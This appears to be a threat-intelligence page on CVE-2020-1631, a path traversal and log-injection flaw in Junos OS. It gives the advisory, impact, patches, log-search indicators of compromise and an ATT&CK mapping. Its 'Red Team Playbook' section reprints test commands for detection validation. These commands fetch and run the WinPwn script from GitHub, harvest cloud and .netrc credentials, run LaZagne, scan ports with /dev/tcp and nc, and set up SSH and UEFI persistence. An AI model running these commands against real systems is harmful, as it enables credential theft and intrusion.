CVE-2020-1631

CRITICAL CISA KEV Pub 04/05 Upd 21/10

Overview

This vulnerability is a local file inclusion (LFI) and path traversal flaw in the HTTP/HTTPS service of Juniper Networks Junos OS, specifically affecting components such as J-Web, Web Authentication, Dynamic-VPN, Firewall Authentication Pass-Through with Web-Redirect, and Zero Touch Provisioning. The root cause lies in improper input validation allowing unauthenticated attackers to manipulate file paths and inject commands into the httpd log files. The affected service runs with limited privileges under the 'nobody' user account on Junos OS devices with HTTP/HTTPS enabled.

Vulnerability Description

A vulnerability in the HTTP/HTTPS service used by J-Web, Web Authentication, Dynamic-VPN (DVPN), Firewall Authentication Pass-Through with Web-Redirect, and Zero Touch Provisioning (ZTP) allows an unauthenticated attacker to perform local file inclusion (LFI) or path traversal. Using this vulnerability, an attacker may be able to inject commands into the httpd.log, read files with 'world' readable permission file or obtain J-Web session tokens. In the case of command injection, as the HTTP service runs as user 'nobody', the impact of this command injection is limited. (CVSS score 5.3, vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) In the case of reading files with 'world' readable permission, in Junos OS 19.3R1 and above, the unauthenticated attacker would be able to read the configuration file. (CVSS score 5.9, vector CVSS:3.1/ AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N) If J-Web is enabled, the attacker could gain the same level of access of anyone actively logged into J-Web. If an administrator is logged in, the attacker could gain administrator access to J-Web. (CVSS score 8.8, vector CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H) This issue only affects Juniper Networks Junos OS devices with HTTP/HTTPS services enabled. Junos OS devices with HTTP/HTTPS services disabled are not affected. If HTTP/HTTPS services are enabled, the following command will show the httpd processes: user@device> show system processes | match http 5260 - S 0:00.13 /usr/sbin/httpd-gk -N 5797 - I 0:00.10 /usr/sbin/httpd --config /jail/var/etc/httpd.conf To summarize: If HTTP/HTTPS services are disabled, there is no impact from this vulnerability. If HTTP/HTTPS services are enabled and J-Web is not in use, this vulnerability has a CVSS score of 5.9 (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N). If J-Web is enabled, this vulnerability has a CVSS score of 8.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H). Juniper SIRT has received a single report of this vulnerability being exploited in the wild. Out of an abundance of caution, we are notifying customers so they can take appropriate actions. Indicators of Compromise: The /var/log/httpd.log may have indicators that commands have injected or files being accessed. The device administrator can look for these indicators by searching for the string patterns "=*;*&" or "*%3b*&" in /var/log/httpd.log, using the following command: user@device> show log httpd.log | match "=*;*&|=*%3b*&" If this command returns any output, it might be an indication of malicious attempts or simply scanning activities. Rotated logs should also be reviewed, using the following command: user@device> show log httpd.log.0.gz | match "=*;*&|=*%3b*&" user@device> show log httpd.log.1.gz | match "=*;*&|=*%3b*&" Note that a skilled attacker would likely remove these entries from the local log file, thus effectively eliminating any reliable signature that the device had been attacked. This issue affects Juniper Networks Junos OS 12.3 versions prior to 12.3R12-S16; 12.3X48 versions prior to 12.3X48-D101, 12.3X48-D105; 14.1X53 versions prior to 14.1X53-D54; 15.1 versions prior to 15.1R7-S7; 15.1X49 versions prior to 15.1X49-D211, 15.1X49-D220; 16.1 versions prior to 16.1R7-S8; 17.2 versions prior to 17.2R3-S4; 17.3 versions prior to 17.3R3-S8; 17.4 versions prior to 17.4R2-S11, 17.4R3-S2; 18.1 versions prior to 18.1R3-S10; 18.2 versions prior to 18.2R2-S7, 18.2R3-S4; 18.3 versions prior to 18.3R2-S4, 18.3R3-S2; 18.4 versions prior to 18.4R1-S7, 18.4R3-S2 ; 18.4 version 18.4R2 and later versions; 19.1 versions prior to 19.1R1-S5, 19.1R3-S1; 19.1 version 19.1R2 and later versions; 19.2 versions prior to 19.2R2; 19.3 versions prior to 19.3R2-S3, 19.3R3; 19.4 versions prior to 19.4R1-S2, 19.4R2; 20.1 versions prior to 20.1R1-S1, 20.1R2.

Impact

An unauthenticated attacker can exploit this vulnerability to read sensitive files, including device configuration files, or inject commands into log files. If J-Web is enabled and an administrator is actively logged in, the attacker can escalate privileges to gain full administrative access to J-Web, effectively compromising device management. No authentication or user interaction is required to exploit the path traversal or file reading aspects, while limited user interaction is needed for full administrative access via J-Web. This can lead to unauthorized disclosure of sensitive network configuration and potential control over the device management interface.

Solution

Juniper Networks has released security advisories addressing this vulnerability under JSA11021. Users should upgrade affected Junos OS devices to fixed versions, including but not limited to 12.3R12-S16, 14.1X53-D54, 15.1R7-S7, 16.1R7-S8, 17.2R3-S4, 18.1R3-S10, 19.3R2-S3, and 20.1R2 or later as specified in the advisory. Devices with HTTP/HTTPS services disabled are not affected. Detailed patch instructions and version-specific fixes are available at https://kb.juniper.net/JSA11021.

EPSS vs KEV Prediction — Evolution (30 days)

Full Analysis

The vulnerability in the HTTP/HTTPS service utilized by Juniper Networks' J-Web, Web Authentication, Dynamic-VPN, Firewall Authentication Pass-Through with Web-Redirect, and Zero Touch Provisioning presents significant security risks. This flaw allows unauthenticated attackers to execute local file inclusion (LFI) or path traversal attacks. By exploiting this vulnerability, an attacker can manipulate the HTTP service to inject commands into the httpd.log file, access files with world-readable permissions, or even obtain session tokens from J-Web. The HTTP service operates under the user 'nobody', which limits the impact of command injection; however, the ability to read sensitive configuration files poses a serious threat, especially in versions of Junos OS 19.3R1 and above.

Attack vectors for this vulnerability are diverse and can be executed remotely without authentication. An attacker could leverage the vulnerability to gain unauthorized access to sensitive information or escalate privileges if an administrator is logged into J-Web. For instance, if the attacker successfully accesses the J-Web session tokens, they could impersonate an administrator and gain full control over the affected device. The exploitation of this vulnerability could lead to unauthorized configuration changes, data breaches, or even service disruptions, making it a critical concern for organizations relying on Juniper Networks' devices.

The real-world impact of this vulnerability can be substantial, particularly for organizations that utilize Juniper's networking equipment in their infrastructure. The potential for unauthorized access to configuration files can lead to exposure of sensitive data, including network configurations and security policies. Additionally, if an attacker gains administrative access, they could manipulate network settings, leading to further vulnerabilities or service outages. The financial and reputational damage resulting from such incidents can be severe, making it imperative for organizations to prioritize the mitigation of this risk.

To detect and mitigate this vulnerability, organizations should first assess whether HTTP/HTTPS services are enabled on their Junos OS devices. Disabling these services is the most effective way to eliminate the risk. For those that require these services, regular monitoring of the httpd.log for suspicious entries, such as command injection patterns, is essential. Administrators should utilize commands to search for indicators of compromise and review rotated logs to identify any malicious activities. Furthermore, applying the latest security patches and updates from Juniper Networks is crucial to ensure that devices are protected against known vulnerabilities.

In summary, the vulnerability in Juniper Networks' HTTP/HTTPS service represents a significant threat to network security. The ability for unauthenticated attackers to exploit this flaw emphasizes the need for robust security practices, including disabling unnecessary services, monitoring logs for suspicious activity, and ensuring timely updates. Organizations must remain vigilant and proactive in their cybersecurity strategies to safeguard their networks against potential exploitation.




CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2020-1631, with our telemetry indicating the first confirmed sighting of exploitation attempts targeting this vulnerability. Concurrently, the CVSS score has been revised downward from 9.8 to 8.8, reflecting updated assessments of exploitability and impact. This shift underscores a nuanced understanding of the vulnerability’s risk profile, balancing the increased detection of exploitation attempts against a recalibrated severity rating. For defenders, the emergence of exploitation activity signals that threat actors are actively probing or leveraging this flaw, elevating the urgency for monitoring and response despite the slightly reduced CVSS score. The current exploit landscape remains without new publicly disclosed exploit techniques, but the uptick in observed activity suggests that adversaries may be refining or deploying existing methods. Overall, this development elevates the operational risk associated with CVE-2020-1631, warranting heightened vigilance in environments running affected Junos OS versions.



Update 2 — June 23, 2026

CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2020-1631, with our telemetry indicating a doubling in detection frequency over recent monitoring periods. Although the EPSS score has slightly declined, this decrease does not correlate with reduced adversary interest; instead, the surge in observed probing and potential exploitation attempts suggests threat actors are intensifying efforts to leverage this vulnerability. The absence of new publicly disclosed exploits implies that attackers may be refining existing techniques rather than deploying novel methods. This heightened activity elevates the operational risk for organizations running vulnerable Junos OS versions, underscoring the necessity for enhanced monitoring and rapid incident response capabilities to address potential local file inclusion or command injection attempts.

Affected Products (277)

Vendor Product Version CPE
juniper Juniper Junos 12.3 cpe:2.3:o:juniper:junos:12.3:-:*:*:*:*:*:*
juniper Juniper Junos 12.3 cpe:2.3:o:juniper:junos:12.3:r1:*:*:*:*:*:*
juniper Juniper Junos 12.3 cpe:2.3:o:juniper:junos:12.3:r10:*:*:*:*:*:*
juniper Juniper Junos 12.3 cpe:2.3:o:juniper:junos:12.3:r10-s1:*:*:*:*:*:*
juniper Juniper Junos 12.3 cpe:2.3:o:juniper:junos:12.3:r10-s2:*:*:*:*:*:*
juniper Juniper Junos 12.3 cpe:2.3:o:juniper:junos:12.3:r11:*:*:*:*:*:*
juniper Juniper Junos 12.3 cpe:2.3:o:juniper:junos:12.3:r12:*:*:*:*:*:*
juniper Juniper Junos 12.3 cpe:2.3:o:juniper:junos:12.3:r12-s1:*:*:*:*:*:*
juniper Juniper Junos 12.3 cpe:2.3:o:juniper:junos:12.3:r12-s11:*:*:*:*:*:*
juniper Juniper Junos 12.3 cpe:2.3:o:juniper:junos:12.3:r12-s12:*:*:*:*:*:*
juniper Juniper Junos 12.3 cpe:2.3:o:juniper:junos:12.3:r12-s13:*:*:*:*:*:*
juniper Juniper Junos 12.3 cpe:2.3:o:juniper:junos:12.3:r12-s14:*:*:*:*:*:*
juniper Juniper Junos 12.3 cpe:2.3:o:juniper:junos:12.3:r12-s15:*:*:*:*:*:*
juniper Juniper Junos 12.3 cpe:2.3:o:juniper:junos:12.3:r12-s3:*:*:*:*:*:*
juniper Juniper Junos 12.3 cpe:2.3:o:juniper:junos:12.3:r12-s4:*:*:*:*:*:*
juniper Juniper Junos 12.3 cpe:2.3:o:juniper:junos:12.3:r12-s6:*:*:*:*:*:*
juniper Juniper Junos 12.3 cpe:2.3:o:juniper:junos:12.3:r12-s8:*:*:*:*:*:*
juniper Juniper Junos 12.3x48 cpe:2.3:o:juniper:junos:12.3x48:-:*:*:*:*:*:*
juniper Juniper Junos 12.3x48 cpe:2.3:o:juniper:junos:12.3x48:d10:*:*:*:*:*:*
juniper Juniper Junos 12.3x48 cpe:2.3:o:juniper:junos:12.3x48:d100:*:*:*:*:*:*
+257 additional CPEs

Exploits

No exploits found for this CVE.

Exploited in Wild CONFIRMED
Ransomware NOT ASSOCIATED
Attacker Interest MEDIUM
Sightings Few sightings

Threat Feed

4 events
2026-06-23
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-19
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-07
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2022-03-25
Added to CISA KEV Catalog

CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog

Likely Kill Chain

Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.

Applicable Out of scope
Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Priv. Escalation
TA0004
Defense Evasion
TA0005
Credential Access
TA0006
Lateral Movement
TA0008
Collection
TA0009
Impact
TA0040

Kill chain derived from the ML classifier.

Attack Vectors ML

Path Traversal
100% path_traversal
OS Command Injection
69% command_injection
Remote Code Execution
65% rce

MITRE ATT&CK Techniques (6)

The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.

ID Name Stage Tactics Platforms Link
T1190 Exploit Public-Facing Application Initial Access initial-access Containers, ESXi, IaaS, Linux, macOS, Network Devices, Windows
T1059 Command and Scripting Interpreter Kill Chain execution ESXi, IaaS, Identity Provider, Linux, macOS, Network Devices, Office Suite, Windows
T1542.001 System Firmware Kill Chain persistence, defense-evasion Windows, Network Devices
T1552.001 Credentials In Files Kill Chain credential-access Containers, IaaS, Linux, macOS, Windows
T1046 Network Service Discovery Kill Chain discovery Containers, IaaS, Linux, macOS, Network Devices, Windows
T1021.004 SSH Kill Chain lateral-movement ESXi, Linux, macOS

CAPEC Attack Patterns ML

ID Name ML Conf. Likelihood Severity Link
CAPEC-126 Path Traversal
43%
High Very High
CAPEC-79 Using Slashes in Alternate Encoding
40%
High High
CAPEC-78 Using Escaped Slashes in Alternate Encoding
35%
High High
CAPEC-64 Using Slashes and URL Encoding Combined to Bypass Validation Logic
34%
High High
CAPEC-76 Manipulating Web Input to File System Calls
32%
High Very High

Red Team Playbook

33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.

T1021.004 ESXi - Enable SSH via PowerCLI Windows PowerShell Privileged
An adversary enables the SSH service on a ESXi host to maintain persistent access to the host and to carryout subsequent operations.
Command (PowerShell)
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false 
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
T1021.004 ESXi - Enable SSH via VIM-CMD Windows CMD
An adversary enables SSH on an ESXi host to maintain persistence and creeate another command execution interface. [Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#enable%20service)
Command (CMD)
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
T1046 Network Service Discovery for Containers containers Shell
Attackers may try to obtain a list of services that are operating on remote hosts and local network infrastructure devices, in order to identify potential vulnerabilities that can be exploited through remote software attacks. They typically use tools to conduct port and...
Command (Shell)
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
T1046 Port Scan Linux, macOS Bash
Scan ports to check for listening ports. Upon successful execution, sh will perform a network connection against a single host (192.168.1.1) and determine what ports are open in the range of 1-65535. Results will be via stdout.
Command (Bash)
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
T1046 Port Scan NMap for Windows Windows PowerShell Privileged
Scan ports to check for listening ports for the local host 127.0.0.1
Command (PowerShell)
nmap #{host_to_scan}
T1046 Port Scan Nmap Linux, macOS Shell Privileged
Scan ports to check for listening ports with Nmap. Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of addresses on port 80 to determine if listening. Results will be via stdout.
Command (Shell)
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
T1046 Port Scan using nmap (Port range) Linux, macOS Shell Privileged
Scan multiple ports to check for listening ports with nmap
Command (Shell)
nmap -Pn -sV -p #{port_range} #{host}
T1046 Port Scan using python Windows PowerShell
Scan ports to check for listening ports with python
Command (PowerShell)
python "#{filename}" -i #{host_ip}
T1046 Port-Scanning /24 Subnet with PowerShell Windows PowerShell
Scanning common ports in a /24 subnet. If no IP address for the target subnet is specified the test tries to determine the attacking machine's "primary" IPv4 address first and then scans that address with a /24 netmask. The connection attempts to use a timeout parameter in...
Command (PowerShell)
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
    $ip_list = $ipAddr -split ","
    $ip_list = $ip_list.ForEach({ $_.Trim() })
    Write-Host "[i] IP Address List: $ip_list"

    $ports = #{port_list}

    foreach ($ip in $ip_list) {
        foreach ($port in $ports) {
            Write-Host "[i] Establishing connection to: $ip : $port"
            try {
                $tcp = New-Object Net.Sockets.TcpClient
                $tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
            } catch {}
            if ($tcp.Connected) {
                $tcp.Close()
                Write-Host "Port $port is open on $ip"
            }
        }
    }
} elseif ($ipAddr -notlike "*,*") {
    if ($ipAddr -eq "") {
        # Assumes the "primary" interface is shown at the top
        $interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
        Write-Host "[i] Using Interface $interface"
        $ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
    }
    Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
    $subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
    # Always assumes /24 subnet
    Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"

    $ports = #{port_list}
    $subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }

    foreach ($ip in $subnetIPs) {
        foreach ($port in $ports) {
            try {
                $tcp = New-Object Net.Sockets.TcpClient
                $tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
            } catch {}
            if ($tcp.Connected) {
                $tcp.Close()
                Write-Host "Port $port is open on $ip"
            }
        }
    }
} else {
    Write-Host "[Error] Invalid Inputs"
    exit 1
}
T1046 Remote Desktop Services Discovery via PowerShell Windows PowerShell Privileged
Availability of remote desktop services can be checked using get- cmdlet of PowerShell
Command (PowerShell)
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
T1046 WinPwn - MS17-10 Windows PowerShell
Search for MS17-10 vulnerable Windows Servers in the domain using powerSQL function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
T1046 WinPwn - bluekeep Windows PowerShell
Search for bluekeep vulnerable Windows Systems in the domain using bluekeep function of WinPwn. Can take many minutes to complete (~600 seconds in testing on a small domain).
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
T1046 WinPwn - fruit Windows PowerShell
Search for potentially vulnerable web apps (low hanging fruits) using fruit function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
T1046 WinPwn - spoolvulnscan Windows PowerShell
Start MS-RPRN RPC Service Scan using spoolvulnscan function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
T1059 AutoIt Script Execution Windows PowerShell
An adversary may attempt to execute suspicious or malicious script using AutoIt software instead of regular terminal like powershell or cmd. Calculator will popup when the script is executed successfully.
Command (PowerShell)
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
T1542.001 UEFI Persistence via Wpbbin.exe File Creation Windows PowerShell Privileged
Creates Wpbbin.exe in %systemroot%. This technique can be used for UEFI-based pre-OS boot persistence mechanisms. - https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c -...
Command (PowerShell)
echo "Creating %systemroot%\wpbbin.exe"      
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
T1552.001 Access unattend.xml Windows CMD Privileged
Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored. If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process.
Command (CMD)
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
T1552.001 Extract Browser and System credentials with LaZagne macOS Bash Privileged
[LaZagne Source](https://github.com/AlessandroZ/LaZagne)
Command (Bash)
python2 laZagne.py all
T1552.001 Extract passwords with grep Linux, macOS Shell
Extracting credentials from files
Command (Shell)
grep -ri password #{file_path}
exit 0
T1552.001 Extracting passwords with findstr Windows PowerShell
Extracting Credentials from Files. Upon execution, the contents of files that contain the word "password" will be displayed.
Command (PowerShell)
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
T1552.001 Find AWS credentials Linux, macOS Shell
Find local AWS credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
T1552.001 Find Azure credentials Linux, macOS Shell
Find local Azure credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
T1552.001 Find GCP credentials Linux, macOS Shell
Find local Google Cloud Platform credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
T1552.001 Find OCI credentials Linux, macOS Shell
Find local Oracle cloud credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
T1552.001 Find and Access Github Credentials Linux, macOS Bash
This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found.
Command (Bash)
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
T1552.001 List Credential Files via Command Prompt Windows CMD Privileged
Via Command Prompt,list files where credentials are stored in Windows Credential Manager
Command (CMD)
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
T1552.001 List Credential Files via PowerShell Windows PowerShell Privileged
Via PowerShell,list files where credentials are stored in Windows Credential Manager
Command (PowerShell)
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
T1552.001 WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials Windows PowerShell
Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials technique via function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive  
T1552.001 WinPwn - SessionGopher Windows PowerShell
Launches SessionGopher on this system via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
T1552.001 WinPwn - Snaffler Windows PowerShell
Check Domain Network-Shares for cleartext passwords using Snaffler function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
T1552.001 WinPwn - passhunt Windows PowerShell
Search for Passwords on this system using passhunt via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
T1552.001 WinPwn - powershellsensitive Windows PowerShell
Check Powershell event logs for credentials or other sensitive information via winpwn powershellsensitive function.
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
T1552.001 WinPwn - sensitivefiles Windows PowerShell
Search for sensitive files on this local system using the SensitiveFiles function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput

Detection & Response Rules

No detection or response rules found for this CVE.

No news articles found for this CVE.

References (3)

Title Tags URL
nvd.nist.gov
NVD reference
https://nvd.nist.gov/vuln/detail/CVE-2020-1631
kb.juniper.net
GitHub CVE x_refsource_CONFIRM
https://kb.juniper.net/JSA11021
cisa.gov
NVD API US Government Resource
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-1631